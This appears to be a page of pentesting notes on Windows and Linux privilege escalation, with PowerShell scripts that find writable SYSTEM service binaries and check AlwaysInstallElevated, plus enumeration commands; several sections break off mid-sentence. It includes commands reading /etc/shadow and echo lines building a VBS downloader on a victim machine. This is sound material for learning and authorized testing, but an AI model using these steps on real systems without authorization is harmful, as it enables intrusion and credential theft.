Shuciran Pentesting Notes

Insecure File Permissions (Windows)

A common way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. For example, consider a scenario in which a software dev...
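The enumeration behind this technique, written out as a PowerShell script. This is an added example, not code from the original notes: it lists services that start as LocalSystem and flags those whose binary, or the directory containing it, grants the current user's token (user SID or any group SID) a write right. The helper names (Test-WritableByMe, Get-ServiceExePath) are this example's own, and the output is a list of candidates to verify by hand, not a confirmed vulnerability.

```powershell
# Added example: find LocalSystem services whose executable or its directory is
# writable by the current (unprivileged) user. Run on the target from a normal shell.

# Every SID the current token carries: the user plus all group memberships.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Rights that let us overwrite the file, or drop a file into the directory.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData

function Test-WritableByMe {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # Translate the ACE principal to a SID so it compares with the token SIDs.
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeRights) -eq 0) { continue }
        # A canonical DACL orders Deny ACEs before Allow ACEs, so a matching Deny wins.
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        return $true
    }
    return $false
}

function Get-ServiceExePath {
    param([string]$PathName)
    # Quoted path: take what is inside the quotes.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted path (possibly with spaces): take everything up to the first ".exe".
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

$candidates = Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -match 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        $exe = Get-ServiceExePath $_.PathName
        $dir = Split-Path -Parent $exe
        [pscustomobject]@{
            Service     = $_.Name
            StartMode   = $_.StartMode
            State       = $_.State
            Binary      = $exe
            ExeWritable = Test-WritableByMe $exe
            DirWritable = Test-WritableByMe $dir
        }
    } |
    Where-Object { $_.ExeWritable -or $_.DirWritable }

$candidates | Format-Table -AutoSize
```

Confirm each hit with icacls on the binary before acting on it. Replacing the binary only pays off if the service can be restarted: check whether the current user may stop and start it (sc sdshow, sc qc) and, for an Auto-start service where that is not possible, whether a reboot is an option (shutdown /r requires SeShutdownPrivilege, visible in whoami /priv).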

Kernel Vulnerabilities

Scenario: CVE-2017-1000112

Kernel exploits are an excellent way to escalate privileges, but success may depend on matching not only the target’s kernel version but also the operating system flavor...

Before running any kernel exploit, record the exact kernel build and distribution (uname -a, /proc/version, /etc/os-release on Linux; systeminfo on Windows) and compare it against the exploit's stated targets: a mismatched kernel exploit usually crashes the target rather than escalating.

User Information (Windows)

Users

User Privileges
whoami /priv
whoami /groups

Network Privileges
net user
net group `domain`
net localgroup `local`
net localgroup <Group Name>
net accounts `domain`
net accounts /domain...

For Privilege Access (Windows)

First, on Windows systems, we should check the status of the AlwaysInstallElevated registry value (under Software\Policies\Microsoft\Windows\Installer). Windows Installer only honours it when it is set to 1 in both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE; if the value is enabled in both hives, any user ...
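The registry check as a small PowerShell function, added here as an example and not taken from the original notes. It reads the value from both hives, treats a missing key or value as 0, and only reports Exploitable when both are 1, which is the condition Windows Installer actually requires. The function name is this example's own.

```powershell
# Added example: report the AlwaysInstallElevated state in both hives.
# Windows Installer runs MSI packages as SYSTEM for any user only when the
# value is 1 under BOTH HKLM and HKCU, so one hive alone is not enough.
function Get-AlwaysInstallElevatedState {
    $keys = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($hive in $keys.Keys) {
        # A missing key or value means the policy is not set: treat it as 0.
        $item = Get-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $state['HKLM']
        HKCU        = $state['HKCU']
        Exploitable = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
    }
}

Get-AlwaysInstallElevatedState
```

When Exploitable is True, an MSI package installed by the current user (msiexec /i) runs with SYSTEM privileges; when only one hive is set, the installer falls back to the user's own privilege level for unmanaged packages and the setting is not useful for escalation.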

Applications

Enumerating Installed Applications and Patch Levels
wmic product get name, version, vendor

Note that querying Win32_Product (wmic product) makes Windows Installer run a consistency check over every installed MSI package, which can trigger repairs, is slow, and writes to the Application event log; prefer the Uninstall registry keys when stealth matters.

List system-wide updates with Win32_QuickFixEngineering (qfe)
wmic qfe get Caption, Description, HotFixI...
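The same enumeration done from the registry and from Get-HotFix, added here as an example rather than code from the original notes. It reads the per-machine (64-bit and WOW6432Node) and per-user Uninstall keys, which avoids the MSI consistency check that Win32_Product triggers, and lists hotfixes through Get-HotFix, which queries the same Win32_QuickFixEngineering class as wmic qfe. The function name Get-InstalledApplication is this example's own.

```powershell
# Added example: enumerate installed applications and patches without Win32_Product.

$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',  # 32-bit apps on 64-bit Windows
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'               # per-user installs
)

function Get-InstalledApplication {
    # Wildcard paths expand to one item per Uninstall subkey; entries without a
    # DisplayName are components or updates rather than applications.
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        ForEach-Object {
            [pscustomobject]@{
                Name      = $_.DisplayName
                Version   = $_.DisplayVersion
                Publisher = $_.Publisher
                Installed = $_.InstallDate
                Location  = $_.InstallLocation   # useful as input for file-permission checks
            }
        } |
        Sort-Object Name -Unique
}

Get-InstalledApplication | Format-Table -AutoSize

# Patch level: HotFixID is the KB number to compare against an exploit's requirements.
Get-HotFix | Sort-Object InstalledOn | Select-Object HotFixID, Description, InstalledOn
```

Compare the Version column against the application's known vulnerable releases and feed the Location column into a file-permission check; a writable install directory for software that runs as a service or at logon is the same class of problem as a writable service binary.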

System (Linux)

Distribution
ls /etc/*-release
cat /etc/os-release
cat /etc/issue
uname -a
cat /proc/version

Interesting files
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
ls -lh /var/mail/
ls -...

Jobs and Tasks

List Cron Jobs
cat /etc/crontab && ls -al /etc/cron*

Find World-Writable Cron Jobs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

Find Cron Jobs Owned by Other Users
find /etc/cro...

FTP (tcp-21)

Upload

To upload a file, change into the directory that contains it and pass ONLY the file name to put; giving a path instead produces a 500 error from the server:
passive # must be off
binary # to upload binaries, execute th...

Insecure File Permissions (Linux)

Writable and executable file

In order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...

VBS Download

From the victim machine command shell, use this list of commands (each echo appends one line of the downloader script to wget.vbs):
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQ...